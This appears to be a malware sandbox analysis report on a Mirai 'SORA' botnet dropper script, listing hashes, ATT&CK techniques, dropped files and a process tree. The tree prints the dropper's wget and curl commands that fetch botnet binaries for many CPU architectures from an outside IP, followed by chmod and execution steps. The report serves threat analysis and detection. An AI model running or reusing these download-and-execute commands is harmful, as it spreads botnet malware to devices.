mirai | b5e07e535902ebb08e33a8f9e861651cef39490d877ed84e566372292631608e

Analysis

max time kernel
11s
max time network
128s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240729-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
08/04/2025, 09:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bin.sh
Size

2KB
MD5

02643e046a24dbdd1b3d7df4d892ae06
SHA1

9a006ba65ff4ae5eb6d1a9b4f4197b81126f9d2a
SHA256

b5e07e535902ebb08e33a8f9e861651cef39490d877ed84e566372292631608e
SHA512

a604b82a4270f842b8a400d0b6976943d9186cbc39fb79f64e33e646c20f8caf85690dc0722f4626ccf34b5d4a2d27f675d280c2325bd904da9211476fcef5f3

Score

10^/10

mirai sora botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

SORA

Extracted

Family

mirai

Botnet

SORA

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 14 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1588	chmod
1599	chmod
1611	chmod
1617	chmod
1623	chmod
1577	chmod
1582	chmod
1594	chmod
1605	chmod
1628	chmod
1634	chmod
1559	chmod
1565	chmod
1571	chmod

Executes dropped EXE 14 IoCs

ioc	pid	Process
/tmp/robben	1560	bin.sh
/tmp/robben	1566	bin.sh
/tmp/robben	1572	bin.sh
/tmp/robben	1578	bin.sh
/tmp/robben	1583	bin.sh
/tmp/robben	1589	bin.sh
/tmp/robben	1595	bin.sh
/tmp/robben	1600	bin.sh
/tmp/robben	1606	bin.sh
/tmp/robben	1612	bin.sh
/tmp/robben	1618	bin.sh
/tmp/robben	1624	bin.sh
/tmp/robben	1629	bin.sh
/tmp/robben	1635	bin.sh

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/fstream-1.dat	upx
behavioral1/files/fstream-4.dat	upx
behavioral1/files/fstream-5.dat	upx
behavioral1/files/fstream-7.dat	upx

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1564	cat
1562	wget
1563	curl

Writes file to tmp directory 26 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/sora.mpsl	wget
File opened for modification	/tmp/sora.arm5	wget
File opened for modification	/tmp/sora.x86	curl
File opened for modification	/tmp/sora.x86_64	wget
File opened for modification	/tmp/sora.x86_64	curl
File opened for modification	/tmp/sora.i686	wget
File opened for modification	/tmp/sora.arm5	curl
File opened for modification	/tmp/sora.sh4	curl
File opened for modification	/tmp/sora.mips	curl
File opened for modification	/tmp/sora.arm4	curl
File opened for modification	/tmp/sora.arm6	wget
File opened for modification	/tmp/sora.arm6	curl
File opened for modification	/tmp/sora.arm7	curl
File opened for modification	/tmp/sora.ppc	wget
File opened for modification	/tmp/sora.ppc	curl
File opened for modification	/tmp/sora.m68k	wget
File opened for modification	/tmp/sora.mpsl	curl
File opened for modification	/tmp/sora.x86	wget
File opened for modification	/tmp/robben	bin.sh
File opened for modification	/tmp/sora.mips	wget
File opened for modification	/tmp/sora.i686	curl
File opened for modification	/tmp/sora.ppc440fp	curl
File opened for modification	/tmp/sora.m68k	curl
File opened for modification	/tmp/sora.sh4	wget
File opened for modification	/tmp/sora.i468	curl
File opened for modification	/tmp/sora.arm7	wget

/tmp/bin.sh
/tmp/bin.sh
1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:1552
- /usr/bin/wget
  wget http://178.149.240.69/bins/sora.x86
  2⤵
  - Writes file to tmp directory
  PID:1553
- /usr/bin/curl
  curl -O http://178.149.240.69/bins/sora.x86
  2⤵
  - Writes file to tmp directory
  PID:1557
- /bin/cat
  cat sora.x86
  2⤵
  PID:1558
- /bin/chmod
  chmod +x bin.sh config-err-Ra2I3T netplan_h1v13_3r robben snap-private-tmp sora.x86 ssh-T6wku1xYGrIW systemd-private-f47eeb414e894b00a26debd2464a5d63-bolt.service-r0GYuA systemd-private-f47eeb414e894b00a26debd2464a5d63-colord.service-rGLnDH systemd-private-f47eeb414e894b00a26debd2464a5d63-ModemManager.service-jpNWwW systemd-private-f47eeb414e894b00a26debd2464a5d63-systemd-resolved.service-Z7NsW9 systemd-private-f47eeb414e894b00a26debd2464a5d63-systemd-timedated.service-PGSOQd
  2⤵
  - File and Directory Permissions Modification
  PID:1559
- /usr/bin/wget
  wget http://178.149.240.69/bins/sora.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1562
- /usr/bin/curl
  curl -O http://178.149.240.69/bins/sora.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1563
- /bin/cat
  cat sora.mips
  2⤵
  - System Network Configuration Discovery
  PID:1564
- /bin/chmod
  chmod +x bin.sh config-err-Ra2I3T netplan_h1v13_3r robben snap-private-tmp sora.mips sora.x86 ssh-T6wku1xYGrIW systemd-private-f47eeb414e894b00a26debd2464a5d63-bolt.service-r0GYuA systemd-private-f47eeb414e894b00a26debd2464a5d63-colord.service-rGLnDH systemd-private-f47eeb414e894b00a26debd2464a5d63-ModemManager.service-jpNWwW systemd-private-f47eeb414e894b00a26debd2464a5d63-systemd-resolved.service-Z7NsW9 systemd-private-f47eeb414e894b00a26debd2464a5d63-systemd-timedated.service-PGSOQd
  2⤵
  - File and Directory Permissions Modification
  PID:1565
- /tmp/robben
  ./robben Payload
  2⤵
  PID:1566
- /usr/bin/wget
  wget http://178.149.240.69/bins/sora.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1568
- /usr/bin/curl
  curl -O http://178.149.240.69/bins/sora.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1569
- /bin/cat
  cat sora.x86_64
  2⤵
  PID:1570
- /bin/chmod
  chmod +x bin.sh config-err-Ra2I3T netplan_h1v13_3r robben snap-private-tmp sora.mips sora.x86 sora.x86_64 ssh-T6wku1xYGrIW systemd-private-f47eeb414e894b00a26debd2464a5d63-bolt.service-r0GYuA systemd-private-f47eeb414e894b00a26debd2464a5d63-colord.service-rGLnDH systemd-private-f47eeb414e894b00a26debd2464a5d63-ModemManager.service-jpNWwW systemd-private-f47eeb414e894b00a26debd2464a5d63-systemd-resolved.service-Z7NsW9 systemd-private-f47eeb414e894b00a26debd2464a5d63-systemd-timedated.service-PGSOQd
  2⤵
  - File and Directory Permissions Modification
  PID:1571
- /tmp/robben
  ./robben Payload
  2⤵
  PID:1572
- /usr/bin/wget
  wget http://178.149.240.69/bins/sora.i468
  2⤵
  PID:1574
- /usr/bin/curl
  curl -O http://178.149.240.69/bins/sora.i468
  2⤵
  - Writes file to tmp directory
  PID:1575
- /bin/cat
  cat sora.i468
  2⤵
  PID:1576
- /bin/chmod
  chmod +x bin.sh config-err-Ra2I3T netplan_h1v13_3r robben snap-private-tmp sora.i468 sora.mips sora.x86 sora.x86_64 ssh-T6wku1xYGrIW systemd-private-f47eeb414e894b00a26debd2464a5d63-bolt.service-r0GYuA systemd-private-f47eeb414e894b00a26debd2464a5d63-colord.service-rGLnDH systemd-private-f47eeb414e894b00a26debd2464a5d63-ModemManager.service-jpNWwW systemd-private-f47eeb414e894b00a26debd2464a5d63-systemd-resolved.service-Z7NsW9 systemd-private-f47eeb414e894b00a26debd2464a5d63-systemd-timedated.service-PGSOQd
  2⤵
  - File and Directory Permissions Modification
  PID:1577
- /tmp/robben
  ./robben Payload
  2⤵
  PID:1578
- /usr/bin/wget
  wget http://178.149.240.69/bins/sora.i686
  2⤵
  - Writes file to tmp directory
  PID:1579
- /usr/bin/curl
  curl -O http://178.149.240.69/bins/sora.i686
  2⤵
  - Writes file to tmp directory
  PID:1580
- /bin/cat
  cat sora.i686
  2⤵
  PID:1581
- /bin/chmod
  chmod +x bin.sh config-err-Ra2I3T netplan_h1v13_3r robben snap-private-tmp sora.i468 sora.i686 sora.mips sora.x86 sora.x86_64 ssh-T6wku1xYGrIW systemd-private-f47eeb414e894b00a26debd2464a5d63-bolt.service-r0GYuA systemd-private-f47eeb414e894b00a26debd2464a5d63-colord.service-rGLnDH systemd-private-f47eeb414e894b00a26debd2464a5d63-ModemManager.service-jpNWwW systemd-private-f47eeb414e894b00a26debd2464a5d63-systemd-resolved.service-Z7NsW9 systemd-private-f47eeb414e894b00a26debd2464a5d63-systemd-timedated.service-PGSOQd
  2⤵
  - File and Directory Permissions Modification
  PID:1582
- /usr/bin/wget
  wget http://178.149.240.69/bins/sora.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1585
- /usr/bin/curl
  curl -O http://178.149.240.69/bins/sora.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1586
- /bin/cat
  cat sora.mpsl
  2⤵
  PID:1587
- /bin/chmod
  chmod +x bin.sh config-err-Ra2I3T netplan_h1v13_3r robben snap-private-tmp sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 ssh-T6wku1xYGrIW systemd-private-f47eeb414e894b00a26debd2464a5d63-bolt.service-r0GYuA systemd-private-f47eeb414e894b00a26debd2464a5d63-colord.service-rGLnDH systemd-private-f47eeb414e894b00a26debd2464a5d63-ModemManager.service-jpNWwW systemd-private-f47eeb414e894b00a26debd2464a5d63-systemd-resolved.service-Z7NsW9 systemd-private-f47eeb414e894b00a26debd2464a5d63-systemd-timedated.service-PGSOQd
  2⤵
  - File and Directory Permissions Modification
  PID:1588
- /tmp/robben
  ./robben Payload
  2⤵
  PID:1589
- /usr/bin/wget
  wget http://178.149.240.69/bins/sora.arm4
  2⤵
  PID:1591
- /usr/bin/curl
  curl -O http://178.149.240.69/bins/sora.arm4
  2⤵
  - Writes file to tmp directory
  PID:1592
- /bin/cat
  cat sora.arm4
  2⤵
  PID:1593
- /bin/chmod
  chmod +x bin.sh config-err-Ra2I3T netplan_h1v13_3r robben snap-private-tmp sora.arm4 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 ssh-T6wku1xYGrIW systemd-private-f47eeb414e894b00a26debd2464a5d63-bolt.service-r0GYuA systemd-private-f47eeb414e894b00a26debd2464a5d63-colord.service-rGLnDH systemd-private-f47eeb414e894b00a26debd2464a5d63-ModemManager.service-jpNWwW systemd-private-f47eeb414e894b00a26debd2464a5d63-systemd-resolved.service-Z7NsW9 systemd-private-f47eeb414e894b00a26debd2464a5d63-systemd-timedated.service-PGSOQd
  2⤵
  - File and Directory Permissions Modification
  PID:1594
- /tmp/robben
  ./robben Payload
  2⤵
  PID:1595
- /usr/bin/wget
  wget http://178.149.240.69/bins/sora.arm5
  2⤵
  - Writes file to tmp directory
  PID:1596
- /usr/bin/curl
  curl -O http://178.149.240.69/bins/sora.arm5
  2⤵
  - Writes file to tmp directory
  PID:1597
- /bin/cat
  cat sora.arm5
  2⤵
  PID:1598
- /bin/chmod
  chmod +x bin.sh config-err-Ra2I3T netplan_h1v13_3r robben snap-private-tmp sora.arm4 sora.arm5 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 ssh-T6wku1xYGrIW systemd-private-f47eeb414e894b00a26debd2464a5d63-bolt.service-r0GYuA systemd-private-f47eeb414e894b00a26debd2464a5d63-colord.service-rGLnDH systemd-private-f47eeb414e894b00a26debd2464a5d63-ModemManager.service-jpNWwW systemd-private-f47eeb414e894b00a26debd2464a5d63-systemd-resolved.service-Z7NsW9 systemd-private-f47eeb414e894b00a26debd2464a5d63-systemd-timedated.service-PGSOQd
  2⤵
  - File and Directory Permissions Modification
  PID:1599
- /tmp/robben
  ./robben Payload
  2⤵
  PID:1600
- /usr/bin/wget
  wget http://178.149.240.69/bins/sora.arm6
  2⤵
  - Writes file to tmp directory
  PID:1602
- /usr/bin/curl
  curl -O http://178.149.240.69/bins/sora.arm6
  2⤵
  - Writes file to tmp directory
  PID:1603
- /bin/cat
  cat sora.arm6
  2⤵
  PID:1604
- /bin/chmod
  chmod +x bin.sh config-err-Ra2I3T netplan_h1v13_3r robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 ssh-T6wku1xYGrIW systemd-private-f47eeb414e894b00a26debd2464a5d63-bolt.service-r0GYuA systemd-private-f47eeb414e894b00a26debd2464a5d63-colord.service-rGLnDH systemd-private-f47eeb414e894b00a26debd2464a5d63-ModemManager.service-jpNWwW systemd-private-f47eeb414e894b00a26debd2464a5d63-systemd-resolved.service-Z7NsW9 systemd-private-f47eeb414e894b00a26debd2464a5d63-systemd-timedated.service-PGSOQd
  2⤵
  - File and Directory Permissions Modification
  PID:1605
- /tmp/robben
  ./robben Payload
  2⤵
  PID:1606
- /usr/bin/wget
  wget http://178.149.240.69/bins/sora.arm7
  2⤵
  - Writes file to tmp directory
  PID:1608
- /usr/bin/curl
  curl -O http://178.149.240.69/bins/sora.arm7
  2⤵
  - Writes file to tmp directory
  PID:1609
- /bin/cat
  cat sora.arm7
  2⤵
  PID:1610
- /bin/chmod
  chmod +x bin.sh config-err-Ra2I3T netplan_h1v13_3r robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 ssh-T6wku1xYGrIW systemd-private-f47eeb414e894b00a26debd2464a5d63-bolt.service-r0GYuA systemd-private-f47eeb414e894b00a26debd2464a5d63-colord.service-rGLnDH systemd-private-f47eeb414e894b00a26debd2464a5d63-ModemManager.service-jpNWwW systemd-private-f47eeb414e894b00a26debd2464a5d63-systemd-resolved.service-Z7NsW9 systemd-private-f47eeb414e894b00a26debd2464a5d63-systemd-timedated.service-PGSOQd
  2⤵
  - File and Directory Permissions Modification
  PID:1611
- /tmp/robben
  ./robben Payload
  2⤵
  PID:1612
- /usr/bin/wget
  wget http://178.149.240.69/bins/sora.ppc
  2⤵
  - Writes file to tmp directory
  PID:1614
- /usr/bin/curl
  curl -O http://178.149.240.69/bins/sora.ppc
  2⤵
  - Writes file to tmp directory
  PID:1615
- /bin/cat
  cat sora.ppc
  2⤵
  PID:1616
- /bin/chmod
  chmod +x bin.sh config-err-Ra2I3T netplan_h1v13_3r robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.x86 sora.x86_64 ssh-T6wku1xYGrIW systemd-private-f47eeb414e894b00a26debd2464a5d63-bolt.service-r0GYuA systemd-private-f47eeb414e894b00a26debd2464a5d63-colord.service-rGLnDH systemd-private-f47eeb414e894b00a26debd2464a5d63-ModemManager.service-jpNWwW systemd-private-f47eeb414e894b00a26debd2464a5d63-systemd-resolved.service-Z7NsW9 systemd-private-f47eeb414e894b00a26debd2464a5d63-systemd-timedated.service-PGSOQd
  2⤵
  - File and Directory Permissions Modification
  PID:1617
- /tmp/robben
  ./robben Payload
  2⤵
  PID:1618
- /usr/bin/wget
  wget http://178.149.240.69/bins/sora.ppc440fp
  2⤵
  PID:1620
- /usr/bin/curl
  curl -O http://178.149.240.69/bins/sora.ppc440fp
  2⤵
  - Writes file to tmp directory
  PID:1621
- /bin/cat
  cat sora.ppc440fp
  2⤵
  PID:1622
- /bin/chmod
  chmod +x bin.sh config-err-Ra2I3T netplan_h1v13_3r robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.x86 sora.x86_64 ssh-T6wku1xYGrIW systemd-private-f47eeb414e894b00a26debd2464a5d63-bolt.service-r0GYuA systemd-private-f47eeb414e894b00a26debd2464a5d63-colord.service-rGLnDH systemd-private-f47eeb414e894b00a26debd2464a5d63-ModemManager.service-jpNWwW systemd-private-f47eeb414e894b00a26debd2464a5d63-systemd-resolved.service-Z7NsW9 systemd-private-f47eeb414e894b00a26debd2464a5d63-systemd-timedated.service-PGSOQd
  2⤵
  - File and Directory Permissions Modification
  PID:1623
- /tmp/robben
  ./robben Payload
  2⤵
  PID:1624
- /usr/bin/wget
  wget http://178.149.240.69/bins/sora.m68k
  2⤵
  - Writes file to tmp directory
  PID:1625
- /usr/bin/curl
  curl -O http://178.149.240.69/bins/sora.m68k
  2⤵
  - Writes file to tmp directory
  PID:1626
- /bin/cat
  cat sora.m68k
  2⤵
  PID:1627
- /bin/chmod
  chmod +x bin.sh config-err-Ra2I3T netplan_h1v13_3r robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.x86 sora.x86_64 ssh-T6wku1xYGrIW systemd-private-f47eeb414e894b00a26debd2464a5d63-bolt.service-r0GYuA systemd-private-f47eeb414e894b00a26debd2464a5d63-colord.service-rGLnDH systemd-private-f47eeb414e894b00a26debd2464a5d63-ModemManager.service-jpNWwW systemd-private-f47eeb414e894b00a26debd2464a5d63-systemd-resolved.service-Z7NsW9 systemd-private-f47eeb414e894b00a26debd2464a5d63-systemd-timedated.service-PGSOQd
  2⤵
  - File and Directory Permissions Modification
  PID:1628
- /tmp/robben
  ./robben Payload
  2⤵
  PID:1629
- /usr/bin/wget
  wget http://178.149.240.69/bins/sora.sh4
  2⤵
  - Writes file to tmp directory
  PID:1631
- /usr/bin/curl
  curl -O http://178.149.240.69/bins/sora.sh4
  2⤵
  - Writes file to tmp directory
  PID:1632
- /bin/cat
  cat sora.sh4
  2⤵
  PID:1633
- /bin/chmod
  chmod +x bin.sh config-err-Ra2I3T netplan_h1v13_3r robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh4 sora.x86 sora.x86_64 ssh-T6wku1xYGrIW systemd-private-f47eeb414e894b00a26debd2464a5d63-bolt.service-r0GYuA systemd-private-f47eeb414e894b00a26debd2464a5d63-colord.service-rGLnDH systemd-private-f47eeb414e894b00a26debd2464a5d63-ModemManager.service-jpNWwW systemd-private-f47eeb414e894b00a26debd2464a5d63-systemd-resolved.service-Z7NsW9 systemd-private-f47eeb414e894b00a26debd2464a5d63-systemd-timedated.service-PGSOQd
  2⤵
  - File and Directory Permissions Modification
  PID:1634
- /tmp/robben
  ./robben Payload
  2⤵
  PID:1635

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/robben

Filesize
28KB

MD5
c665be249de8aacbf7f020710556850f

SHA1
7bf15fe8983c1a7304ecb626385fd8d656657750

SHA256
c70c7d6288ddd3de1e999fef3e15a4cb7d23656de44209d834ea08c97f26f2c3

SHA512
2125eacc929f9f6ab5232960153e3a3c2d554cd3f65fa7fb97324a275ce27034621999f2922aaa2a4beeeda75d09b2ff89aab6417e2f93329f56ce2529cd14d8

Download Submit
/tmp/robben

Filesize
28KB

MD5
cb095025fabaf4935e7cde669f9b83cb

SHA1
f057ff497853eac9b47772ae58a6be561c16edf7

SHA256
d0a729eda4e98c132a68864f1feb9f2676840909d2584c4e8225ac058af1581f

SHA512
e4df6b3d5de8f2e09c31321931f471b2acf08f24457ac13c59aa24ede5e579db85c07cd447015ddfcf00be0d828277c03598bb732aad9e4928f83c54b7a18739

Download Submit
/tmp/robben

Filesize
212B

MD5
83ab6cd9a67528bbc6f4f360cb7f8d83

SHA1
07e8f17209e0569aab39f062568ff0090d9b20d4

SHA256
3ffdc3e7f17876fa23ee6595712e544975dc985d313fe07fd103e6cd3606b435

SHA512
171e8022f004540814acfc611cd0c46f708fdc6dd2590042981cb00f8136baa6521155549a77e98352901b0dfa5a8d284feb37a7babf9e2bf400a9acc3bb686f

Download Submit
/tmp/robben

Filesize
28KB

MD5
659a441fb5d03828d0e1dcdc8e94515c

SHA1
bf70af5209d2a89bd12c9a9d4b148ddd9b4af02f

SHA256
0e878390d0a19156525789562bacf861294b18a9308312e4a9c943d6e900ff44

SHA512
25d5d73027f64202338f40ae6ee71b12fa64db01e5b82afe2a3bb7abb415c19246b4368ddb1f98041a439155cadafd7eb7894e67eb31d84f205acc62b70d6cb8

Download Submit
/tmp/robben

Filesize
64KB

MD5
d3114b8b81fe0dabf36ebb38e3f69ffe

SHA1
ef38c94966a0649c3797af3adb5287c887ef122a

SHA256
2d760402220357d43f57edbef3d9e8d9f0526a6c677b4cb77dd63eaceb6f67d1

SHA512
d43b02f9ca7a489270f552c1a89b3c6d36270fa06090a9cdfe64f506ac3d0eb344de161a25c639128ac66ac77573b389087f36939177f3cc189ec39a23addc72

Download Submit
/tmp/sora.x86

Filesize
27KB

MD5
ed0134170c819d0a2c3526f5ed8ecad5

SHA1
af1324bb6e6554b496e5938185f74456b69e54e1

SHA256
cd67a9db1c069d8a9ee68a76c68d20c53659d319425ecabf8a0c5b193aeb6fe8

SHA512
98ebd8a6a42f7c3a324cacc429d27fdd5cecf9995971adefdef184e15926741263a19429fa2966a4ced0d00fa715a36028e23b8e7cf5a5e0e567296d34b56ab6

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads